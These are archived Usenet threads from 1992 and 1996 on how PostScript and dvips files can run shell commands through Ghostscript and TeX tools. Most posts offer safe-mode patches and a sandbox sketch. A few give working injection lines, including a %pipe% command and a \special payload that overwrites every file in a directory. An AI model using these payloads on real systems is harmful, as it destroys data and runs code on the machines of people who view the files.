Newsgroups: alt.gopher,alt.security,comp.lang.postscript From: riddle@is.rice.edu (Prentiss Riddle) Subject: Gopher PostScript data type would constitute a security hole Summary: Re: new "type" for UNIX text documents? Date: Tue, 5 May 1992 16:11:26 GMT In article <1992May5.033112.13853@menudo.uh.edu> davison@menudo.uh.edu (Dan Davison) writes: >... How are new types added to the gopher protocol? For >instance, we'd like to be able to return a genetic map in (say) >postscript format; this would require that the client be able to >interpret postscript (OK for NeXT and Suns) or call an interpreter >(Mac?) DOS has ghostview... I've been waiting for this to come up. One of my colleagues here who was looking at the use of PostScript with Metamail stumbled across a disturbing fact: > Article: 6158 of alt.security > From: pkn@is.rice.edu (Kay Nettle) > Subject: a safe Postscript interpreter > Message-ID: <1992Apr7.181248.28090@rice.edu> > Date: Tue, 7 Apr 1992 18:12:48 GMT > > I have just become aware that Postscript can have security holes in > it, filenameforall, deletefile, renamefile, etc. Does anyone know of > a "safe" Postscript interpreter? > > Kay Nettle internet:pkn@is.rice.edu To spell this out a bit more clearly: some implementations of PostScript include functions which could be used by the malicious to create trojan horses. The functions appear to be powerful enough to delete files, list directories, mail away data from your system, and conceivably even implement PostScript viruses. GhostScript, the GNU PostScript interpreter on which GhostView is based, appears to implement these scary functions, and the author has not been responsive to our request that a "safe" mode be added to GhostScript. Nor have we found an alternative PostScript previewer with a "safe" mode. I would urge that a solution to this problem be found before a PostScript type is added to Gopher. If a full previewer with a "safe" mode isn't available for all the architectures served by Gopher, perhaps a simple filter which strips suspect commands out of PostScript files would do the trick. This has been posted to comp.lang.postscript and alt.security before, and I'm slightly astonished at the lack of response. Meanwhile, think twice before previewing any PostScript files from sources you don't trust. -- Prentiss Riddle ("aprendiz de todo, maestro de nada") riddle@rice.edu -- Unix Systems Programmer, Office of Networking and Computing Systems -- Rice University, POB 1892, Houston, TX 77251 / Mudd 208 / 713-285-5327 -- Opinions expressed are not necessarily those of my employer. ------------------------------------------------------------------------- Newsgroups: alt.gopher,alt.security,comp.lang.postscript From: wollman@UVM.EDU (Garrett Wollman) Subject: Re: Gopher PostScript data type would constitute a security hole Date: Tue, 5 May 1992 18:56:52 GMT In article <1992May5.161126.11521@rice.edu> riddle@is.rice.edu (Prentiss Riddle) writes: >GhostScript, the GNU PostScript interpreter on which GhostView is >based, appears to implement these scary functions, and the author has >not been responsive to our request that a "safe" mode be added to >GhostScript. Nor have we found an alternative PostScript previewer >with a "safe" mode. There already *is* one. Observe: wollman@sal(25)$ touch foo.c wollman@sal(26)$ gs -dWRITESYSTEMDICT Initializing... done. Ghostscript 2.4.1 (4/21/92) Copyright (C) 1990, 1992 Aladdin Enterprises, Menlo Park, CA. All rights reserved. Distributed by Free Software Foundation, Inc. Ghostscript comes with NO WARRANTY: see the file LICENSE for details. GS>systemdict begin /deletefile { pop } def end GS>(foo.c) deletefile GS>wollman@sal(27)$ ls -l foo.c -rw-r--r-- 1 wollman csugrads 0 May 5 14:54 foo.c How's that? -GAWollman Garrett A. Wollman = wollman@uvm.edu = UVM is welcome to my opinions = uvm-gen!wollman = That's what being alive is all about. No deity, no higher goal exists, than to bring joy to another person. - Elf Sternberg ------------------------------------------------------------------------ Newsgroups: alt.gopher,alt.security,comp.lang.postscript From: jgreely@morganucodon.cis.ohio-state.edu (J Greely) Subject: Re: Gopher PostScript data type would constitute a security hole In-Reply-To: wollman@UVM.EDU's message of Tue, 5 May 1992 18: 56:52 GMT Date: Tue, 5 May 1992 22:56:37 GMT In article <1992May5.185652.6305@uvm.edu> wollman@UVM.EDU (Garrett Wollman) writes: >In article <1992May5.161126.11521@rice.edu> riddle@is.rice.edu > (Prentiss Riddle) writes: >>GhostScript, the GNU PostScript interpreter on which GhostView is >>based, appears to implement these scary functions, and the author has >>not been responsive to our request that a "safe" mode be added to >>GhostScript. The beauty of free software is that you can fix it yourself. The beauty of the net is that you can find someone else to fix it for you :-). [solution deleted] >How's that? The following patch to gs_init.ps (2.4.1) amplifies on Garrett's idea, allowing you to say -DSAFE on the command line. It disables renamefile, deletefile, and restricts the file operator to reading. *** gs_init.ps.old Tue May 5 16:50:40 1992 --- gs_init.ps Tue May 5 17:54:03 1992 *************** *** 35,40 **** --- 35,41 ---- currentdict /NOPAUSE known /NOPAUSE exch def currentdict /QUIET known ASCIIOUT or /QUIET exch def currentdict /WRITESYSTEMDICT known /WRITESYSTEMDICT exch def + currentdict /SAFE known /SAFE exch def % Acquire environment variables. currentdict /DEVICE known not *************** *** 343,348 **** --- 344,356 ---- % Temporarily substitute it for the real `run'. /.run /run load def /run /run0 load def + + % disable potentially-dangerous file operators + SAFE { + /file {dup (r) eq {file} {pop pop} ifelse} bind odef + /renamefile {pop pop} odef + /deletefile {pop} odef + } if % If the user asked for ASCII output, read in the patches now. ASCIIOUT { (gs_2asc.ps) run } if -- J Greely (jgreely@cis.ohio-state.edu; osu-cis!jgreely) -------------------------------------------------------------------- Newsgroups: alt.gopher,alt.security,comp.lang.postscript From: jgreely@morganucodon.cis.ohio-state.edu (J Greely) Subject: Re: Gopher PostScript data type would constitute a security hole Date: Wed, 6 May 1992 17:59:02 GMT In article jgreely@morganucodon.cis.ohio-state.edu (J Greely) writes: >The beauty of free software is that you can fix it yourself. The >beauty of the net is that you can find someone else to fix it for you >:-). The *real* beauty of the net is that you quickly discover when you're wrong :-). >The following patch to gs_init.ps (2.4.1) amplifies on Garrett's idea, >allowing you to say -DSAFE on the command line. It disables >renamefile, deletefile, and restricts the file operator to reading. My patch is sufficient, unless you have a printer driver compiled into your copy of Ghostscript on a unix system. Printer drivers have the novel ability to write to a pipe, and gs blindly uses popen on the string provided. I'll have to recompile with a printer device to see just how much damage you can do, but I have this hunch that "mark /OutputFile (|chmod a+w .) currentdevice putdeviceprops" works. -- J Greely (jgreely@cis.ohio-state.edu; osu-cis!jgreely) -------------------------------------------------------------------- From: eengelke@sail.uwaterloo.ca (Erick Engelke) Newsgroups: alt.gopher,alt.security,comp.lang.postscript Subject: Re: Gopher PostScript data type would constitute a security hole Date: 6 May 92 21:20:00 GMT jgreely@morganucodon.cis.ohio-state.edu (J Greely) writes: >> riddle@is.rice.edu (Prentiss Riddle) writes: >>>GhostScript, the GNU PostScript interpreter on which GhostView is >>>based, appears to implement these scary functions, and the author has >>>not been responsive to our request that a "safe" mode be added to >>>GhostScript. > >The beauty of free software is that you can fix it yourself. The >beauty of the net is that you can find someone else to fix it for you >:-). And even better, the creator or user of the 'fixed' version might like to make it freely FTPable, particularly the executable... Erick Erick Engelke Engineering Computing University of Waterloo Waterloo TCP Architect erick@development.watstar.uwaterloo.ca ------------------------------------------------------------------------ Newsgroups: alt.gopher,alt.security,comp.lang.postscript From: peter@ferranti.com (Peter da Silva) Subject: Re: Gopher PostScript data type would constitute a security hole Date: Wed, 6 May 1992 21:05:23 GMT In article <1992May5.161126.11521@rice.edu> riddle@is.rice.edu (Prentiss Riddle) writes: > I've been waiting for this to come up. One of my colleagues here who > was looking at the use of PostScript with Metamail stumbled across a > disturbing fact: Postscript is a general purpose programming language. If you can convince a program to execute arbitrary code without examination you have a perfect trojan horse. That horse can carry a virus, a bomb, anything. Even if all it does is change your printer password it's dangerous. I'm surprised nobody has hidden something nasty inside the encoded part of a Postscript font yet. -- Peter da Silva `-_-' Programmer, network firefighter, thrillseeker 'U` Ferranti International Controls Corporation Have you hugged Sugar Land, TX 77487-5012 +1 713 274 5180 your wolf today? ------------------------------------------------------------------------- Newsgroups: alt.gopher,alt.security,comp.lang.postscript From: duck@frcs.Alt.ZA (Paul Ducklin) Subject: Re: Gopher PostScript data type would constitute a security hole Date: Wed, 6 May 92 20:55:12 GMT Thus spake riddle@is.rice.edu (Prentiss Riddle): >perhaps a simple filter which strips suspect commands out of PostScript >files would do the trick. This has been posted to comp.lang.postscript >and alt.security before, and I'm slightly astonished at the lack of >response. Such a filter would not be reliable, surely: static analysis of code is easily tricked by encryption, even trivial encryption. You'd definitely want to rely upon a secure interpreter, IMO. Does all of this mean we'll see the revival of the good ole' Letter Bomb Trojan? Paul Ducklin Somewhere near the middle of the City of Pretoria South Africa ------------------------------------------------------------------------- Newsgroups: alt.gopher,alt.security,comp.lang.postscript From: jgreely@morganucodon.cis.ohio-state.edu (J Greely) Subject: Re: Gopher PostScript data type would constitute a security hole Date: Thu, 7 May 1992 16:44:55 GMT In article <1992May6.212000.7886@watserv1.waterloo.edu> eengelke@sail.uwaterloo.ca (Erick Engelke) writes: >And even better, the creator or user of the 'fixed' version might like >to make it freely FTPable, particularly the executable... Why? You've already got the fix, and I'll be sending it off to Peter as soon as I close the printer device problem (which should get it into the next release, since I'm careful not to break anything). Putting an executable up for ftp would be useless. How many of you run the same hardware and install software the same place I do? More importantly, since it's a question of security, why would you want to trust *my* executable? Just because I've got privs to put something up for ftp doesn't mean I'm one of the good guys. I posted my fix here so people could use it, verify it, and yell at me if I missed something (which I did). While I'm on the subject, I changed my mind about how to do it. I think the default should be for those operators to be safe, and a -DUNSAFE switch should enable them for people who know what they're doing or are operating in a closed environment. Here's the replacement: *** gs_init.ps.old Thu May 7 10:51:59 1992 --- gs_init.ps Thu May 7 10:51:30 1992 *************** *** 35,40 **** --- 35,41 ---- currentdict /NOPAUSE known /NOPAUSE exch def currentdict /QUIET known ASCIIOUT or /QUIET exch def currentdict /WRITESYSTEMDICT known /WRITESYSTEMDICT exch def + currentdict /UNSAFE known /UNSAFE exch def % Acquire environment variables. currentdict /DEVICE known not *************** *** 343,348 **** --- 344,357 ---- % Temporarily substitute it for the real `run'. /.run /run load def /run /run0 load def + + % disable potentially-dangerous file operators, unless you + % really want them. + UNSAFE not { + /file {dup (r) eq {file} {pop pop} ifelse} bind odef + /renamefile {pop pop} odef + /deletefile {pop} odef + } if % If the user asked for ASCII output, read in the patches now. ASCIIOUT { (gs_2asc.ps) run } if -- J Greely (jgreely@cis.ohio-state.edu; osu-cis!jgreely) ----------------------------------------------------------------- Newsgroups: alt.gopher,alt.security,comp.lang.postscript From: amanda@visix.com (Amanda Walker) Subject: Re: Gopher PostScript data type would constitute a security hole Date: Sat, 9 May 92 01:23:09 GMT I think a number of people are missing an important point here. Any software which displays a PostScript file by simply squirting the PostScript at the closest interpreter is asking for trouble. The file should be interpreted in its own "padded" environment, both for "Trojan Horse" protection as well as simple robustness in the face of errors. J Greely's mods to GhostScript are one approach to this. Another approach is to have a second layer of interpretation which handles everything but actual rendering commands, effectively "half-compiling" or "distilling" the document on the fly. This is how I would do it--PostScript is not that complex a language, after all. This also lets you put your interpreter on top of some other rendering engine in case you don't actually have Display PostScript, NeWS, or whatever. I don't think that we should hold it against PostScript as a data interchange format that people can write naive software and thereby shoot themselves in the foot... Amanda Walker amanda@visix.com Visix Software Inc. ...!uupsi!visix.com!amanda ----------------------------------------------------------------- Newsgroups: alt.gopher,alt.security,comp.lang.postscript From: john@iastate.edu (John Hascall) Subject: Re: Gopher PostScript data type would constitute a security hole Date: Mon, 11 May 1992 13:42:45 GMT amanda@visix.com (Amanda Walker) writes: }I think a number of people are missing an important point here. Any software }which displays a PostScript file by simply squirting the PostScript at the }closest interpreter is asking for trouble. The file should be interpreted }in its own "padded" environment, both for "Trojan Horse" protection as well }as simple robustness in the face of errors. ... Rather than worrying about every possible sequence of PS that might be nasty, wouldn't it be better to do contain the environment with something like the following pseudo-C: switch (fork()) { /* not complete, */ case -1 : /* but you get the idea... */ fatal("hosed by fork"); case 0: mkdir("/tmp/ps_"); chroot("/tmp/ps_"); setuid(user2uid("nobody")); exit (doPSinterp()); default: ...wait(...) } -------------------------------------------------------------------------- Newsgroups: alt.gopher,alt.security,comp.lang.postscript From: eengelke@sail.uwaterloo.ca (Erick Engelke) Subject: Re: Gopher PostScript data type would constitute a security hole Date: Tue, 12 May 1992 07:54:55 GMT jgreely@morganucodon.cis.ohio-state.edu (J Greely) writes: > eengelke@sail.uwaterloo.ca (Erick Engelke) writes: >>And even better, the creator or user of the 'fixed' version might like >>to make it freely FTPable, particularly the executable... >Why? You've already got the fix, and I'll be sending it off to Peter >as soon as I close the printer device problem (which should get it >into the next release, since I'm careful not to break anything). Because we may have other valid and creative uses for the postscript interpretter outside gopher but don't have time to manage yet another source tree and diffs. I too make megabytes of source available to others, and rely on their feedback to help advance the cause, but I don't expect everyone to maintain copies of my source just to use my stuff. >More >importantly, since it's a question of security, why would you want to >trust *my* executable? Just because I've got privs to put something >up for ftp doesn't mean I'm one of the good guys. You're absolutely correct, your suspicious nature is starting to worry me... Actually I'm just trying to save myself a few hours churning out another application and using someone else's effort instead of my own. Erick -- Erick Engelke Engineering Computing University of Waterloo Waterloo TCP Architect erick@development.watstar.uwaterloo.ca ----------------------------------------------------------------- Newsgroups: alt.gopher,alt.security,comp.lang.postscript From: jgreely@morganucodon.cis.ohio-state.edu (J Greely) Subject: Re: Gopher PostScript data type would constitute a security hole Date: Tue, 12 May 1992 17:32:18 GMT In article <1992May12.075455.11282@watserv1.waterloo.edu> eengelke@sail.uwaterloo.ca (Erick Engelke) writes: >Because we may have other valid and creative uses for the >postscript interpretter outside gopher but don't have time to >manage yet another source tree and diffs. I think you misunderstood. I posted a patch to Ghostscript's initialization file, which is read at runtime. I also sent it off to the author, to (hopefully) have it added to the next release. Why put it up for anonymous ftp? Anyone who reads c.l.p has already seen it, and anyone who doesn't wouldn't know what site to look on. If someone comes along later and asks about it, it's just as quick to mail them the patch as a pointer to it. >You're absolutely correct, your suspicious nature is starting >to worry me... Paranoia is an occupational hazard. -- J Greely (jgreely@cis.ohio-state.edu; osu-cis!jgreely) ------------------------------------------------------------------- From: harald@manowar.ka.sub.org (Harald Weidner) Newsgroups: de.comp.security Subject: Re: Manipulation via Postscript Files moeglich? Date: 11 Mar 1996 17:12:46 GMT In article <4i0tg5$mks@brachio.zrz.TU-Berlin.DE>, Georg Schwarz wrote: >Nach all der Aufregung über die Sicherheitslücken (oder auch nicht) in >Netscape würde es mich interessieren, ob es nicht auch z.B. in >PostScript Möglichkeiten der Manipulation des Systems gibt, auf dem der >Postscript-Interpreter (z.B. Ghostscript) läuft. Selbstverstaendlich. Schreibe folgendes in eine Datei, z.B. test.ps %!PS- (%pipe%echo spoofed > /tmp/hurz) (r) file quit und rufe "gs test.ps" auf. Dann wirst Du eine Datei namens "hurz" in /tmp vorfinden... Wenn man gs mit der Option -dSAVER aufruft, wird das Schlimmste ver- hindert, aber man kann immer noch genuegend Mist bauen. Tschau, Harald -- Harald Weidner harald@manowar.ka.sub.org The world is a stage +49 721 25597 Harald.Weidner@ira.uka.de Where we all can play Stephanienstr. 21 uk8u@rz.uni-karlsruhe.de Another fine reason 76133 Karlsruhe Heavy@irc To live ------------------------------------------------------------------ From: schild@gmd.de (Goeran Schild) Newsgroups: de.comp.security Subject: Re: Manipulation via Postscript Files =?ISO Date: 14 Mar 1996 09:58:45 GMT Man sollte meiner Meinung nach auch vorsichtig sein beim Ausdrucken fremder dvi-Dateien, oder genauer wenn man dabei dvips von Tom Rokicki verwendet. Vielleicht ist noch keiner darauf gekommen, aber dieses Programm nimmt z.B. anstandslos den folgenden TeX-Befehl: \special{psfile="`for f in `ls`; do echo Pech gehabt! >$f; done"} Nur mal so als Beispiel. Diese Anweisung erscheint dann zwar auf dem Terminal, aber vielleicht zu spaet. Goeran Schild (goeran.schild@gmd.de) --------------------------------------------------------------------- From: schild@gmd.de (Goeran Schild) Newsgroups: de.comp.security Subject: Re: Manipulation via Postscript Files =?ISO Date: 14 Mar 1996 11:34:42 GMT In article i7s@omega.gmd.de, schild@gmd.de (Goeran Schild) writes: > Man sollte meiner Meinung nach auch vorsichtig sein beim Ausdrucken fremder dvi-Dateien, oder genauer wenn man dabei dvips von Tom Rokicki verwendet. Vielleicht ist noch keiner darauf gekommen, aber dieses Programm nimmt z.B. anstandslos den folgenden TeX-Befehl: > > \special{psfile="`for f in `ls`; do echo Pech gehabt! >$f; done"} > > Nur mal so als Beispiel. Diese Anweisung erscheint dann zwar auf dem Terminal, aber vielleicht zu spaet. > > Goeran Schild (goeran.schild@gmd.de) > > Mir ist noch eingefallen, dass es auch eleganter geht: \special{psfile="`bild.ps"} wobei bild.ps keine Postscript-Datei, sonders ein ausfuehrbares file ist. Das ist dann an den Terminalausgaben nicht mehr zu erkennen. Das Programm xdvi scheint diesen \special-Befehl auch zu kennen. Ein Aufruf der Art "xdvi datei.dvi" reicht, um die "Kraefte im Hintergrund" freizusetzen. Goeran Schild (goeran.schild@gmd.de)